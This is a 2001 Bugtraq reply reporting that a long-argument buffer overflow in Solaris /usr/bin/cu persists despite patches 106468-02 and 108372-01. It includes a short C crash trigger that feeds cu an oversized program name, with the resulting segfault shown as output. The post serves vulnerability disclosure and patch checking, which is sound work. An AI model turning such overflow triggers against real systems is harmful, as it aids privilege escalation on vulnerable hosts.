Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Mon, 29 Jan 2001 20:21:39 -0800
hal King <hck () UTK EDU> writes:
> In Solaris 2.6, patch 106468-02 replaces cu; in Sol 7, patch 108372-01
> replaces it for gets() use. The script does SegFault in 8, but no core
> file... I am running 10/2000 revision and 108372 came out in May, so
> it's probably cool.

Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:

# cat > cu_exploit.c
#include <stdio.h>
void main(int argc,char **argv)
{
    char *buf;
    buf = (char *) malloc(atoi(argv[1])*sizeof(char));
    memset(buf,0x41,atoi(argv[1])-1);
    buf[atoi(argv[1])-1]=0;
    execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
    permissions <4111> expected <0111> actual

106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq () dilvish speed net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
